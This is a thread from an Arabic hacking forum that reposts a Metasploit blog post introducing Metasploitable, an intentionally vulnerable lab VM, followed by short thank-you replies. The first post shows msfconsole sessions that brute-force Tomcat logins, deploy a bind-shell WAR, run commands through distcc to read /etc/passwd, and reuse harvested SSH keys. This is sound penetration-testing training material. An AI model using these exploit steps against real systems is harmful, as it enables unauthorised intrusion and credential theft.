التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 06-04-2010, 12:55 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

.................... توزيعة metasploitable : A Vulnerable Server!


السلام عليكم ورحمة الله وبركاته


توزيعة لينكس من صنع rapid7 team تحتوي على العديد من الثغرات تستحق التجريب .
ان شاء سوف يكون هنالك دروس لكيفية اختراقها باحترافية.


Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of Vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.

You can use most VMware products to run it, and you'll want to make sure it's configured for Host-only networking unless it's in your lab - no need to throw another Vulnerable machine on the corporate network. It's configured in non-persistent-disk mode, so you can simply reset it if you accidentally 'rm -rf' it.

Here are a couple of the things you can do with it in msfconsole:

Using the 'Tomcat Application Manager Login Utility' provided by MC, Matteo Cantoni, and jduck, you can test credentials against a Tomcat application (assuming the manager component is enabled):

msf > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
msf auxiliary(tomcat_mgr_login) > exploit

...
[*] 10.0.0.33:8180 - Trying username:'tomcat' with password:'role1'
[-] http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 10.0.0.33:8180 - Trying username:'tomcat' with password:'root'
[-] http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 10.0.0.33:8180 - Trying username:'tomcat' with password:'tomcat'
[+] http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 10.0.0.33:8180 - Trying username:'both' with password:'admin'

Woot! That's a valid (tomcat:tomcat) login. - Now that we have valid credentials, let's try jduck's Tomcat Manager Application Deployer (tomcat_mgr_deploy) against it:

msf > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux X86"
[*] Uploading 1612 bytes as HJpy1H.war ...
[*] Executing /HJpy1H/EpKaNLsCQUUjo.jsp...
[*] Undeploying HJpy1H ...
[*] Sending stage (36 bytes) to metasploitable
[*] Command shell session 1 opened (10.0.0.11:39497 -> 10.0.0.33:4444) at 2010-05-19 11:53:12 -0500


Sweet! And... that's a shell, facilitated by a malcious .WAR file. The distcc_exec module is also a nice exploit to test with. In this case, we'll use a command payload to 'cat /etc/passwd':

use unix/misc/distcc_exec
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/generic
msf exploit(distcc_exec) > set RHOST metasploitable
msf exploit(distcc_exec) > set CMD 'cat /etc/passwd'
msf exploit(distcc_exec) > exploit
connecting...

[*] stdout: root:x:0:0:root:/root:/bin/bash
[*] stdout: daemon:x1:daemon:/usr/sbin:/bin/sh
...

Code exec!

It's great fun to run Express against it too. A single bruteforce of ssh or telnet will return 5 sessions (from the 5 different weak accounts on the VM):



Once we have an open session we can run "Evidence Collection" and pick up any ssh keyfiles from the user accounts we gained access to. (Note that you can do this from the console too, manually - spawn a shell and check the .ssh directories). Now when we run another bruteforce (with 'known' credentials), you can see that it uses the SSH keyfiles to obtain access to the box:



To download Metasploitable, you can pick up the torrent on the Express Community site. If you are an Express customer, you can pick up a direct HTTP download from the Customer Center. See the README.txt here for additional information, but be aware, there are spoilers in it.

source : http://blog.metasploit.com

best regards .
DATA$HACK




j,.dum metasploitable : A Vulnerable Server!

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

رد مع اقتباس
قديم 06-20-2010, 10:25 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


Good WorK thank you man

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 06-23-2010, 06:08 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
D-GhosT s3cur!Ty-Z
::. Moderators .::
 
الصورة الرمزية D-GhosT s3cur!Ty-Z
 

 

 
إحصائية العضو







D-GhosT s3cur!Ty-Z غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
D-GhosT s3cur!Ty-Z is on a distinguished road

افتراضي


thank you very much brother its so great jop from you

التوقيع

Palastine 4ever



يرجى من الاخوة الكرام الاطلاع على قوانين الشبكة
لكي تكون لك مشاركة رائعة مع الشبكة


http://www.vbspiders.com/vb/t71973.html

 

   

رد مع اقتباس
قديم 09-23-2010, 07:54 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو








cisco_security غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
cisco_security is on a distinguished road

افتراضي


very good this work , thank's for you man

التوقيع

OFF Line

My be will return one day

Inchalah

 

   

رد مع اقتباس
قديم 11-24-2010, 08:00 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية majed_19845
 

 

 
إحصائية العضو








majed_19845 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
majed_19845 is on a distinguished road

افتراضي


بارك الله فيك أخي data$hack
وتم تحميل النسخة
والحمد لله تم تنصيبها على ال virtualbox بنجاح بعد عناء

   

رد مع اقتباس
قديم 01-04-2011, 01:18 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


good work ... thank you brother

keep up




Dr.NaNo

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 09-17-2011, 02:13 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية LuckY_13
 

 

 
إحصائية العضو





LuckY_13 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
LuckY_13 is on a distinguished road

افتراضي رد: توزيعة metasploitable : A Vulnerable Server!


great

   

رد مع اقتباس
قديم 09-29-2011, 12:45 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية kimcam
 

 

 
إحصائية العضو





kimcam غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kimcam is on a distinguished road

افتراضي رد: توزيعة metasploitable : A Vulnerable Server!


بارك الله فيك أخي

   

رد مع اقتباس
قديم 01-06-2012, 01:27 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية محمد50
 

 

 
إحصائية العضو






محمد50 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
محمد50 is on a distinguished road

افتراضي رد: توزيعة metasploitable : A Vulnerable Server!


ok god
me no linxs
bak

التوقيع

اقتباس
نئسف لقد تم اعتزال من عالمات الهاكات + تراكات + لينكاسات
1اقدم رساله لي كل محبين لي انا لقد تم العتزل من علم الهكر + الكراكر + لينكس + ..........!!!
2 نشكر على التقيم لي انا بي كل المشركات
3 شكر على كل من اقام بي راد على الموضوعي انا
4 وعلى في بعض نلس ما يحبون انا لكن انا اقول لهم انا احبكم لان ههه بي نهتيه نحن اخوان بي الئسلام واقول لهم اسف ان انا قد تم من انا كللمه مش حلوه اسف اتسف
كان معكم ((( محمد50))))+قوقل هكرز+ميكرسوفت حمايه+ميكرسوفت هكرز+لينكس هكر بااااااااااااااااااااااااي

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
REAL HACKING : METASPLOITABLE data$hack Penteration Testing Training 17 02-09-2020 04:42 AM


الساعة الآن 01:34 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0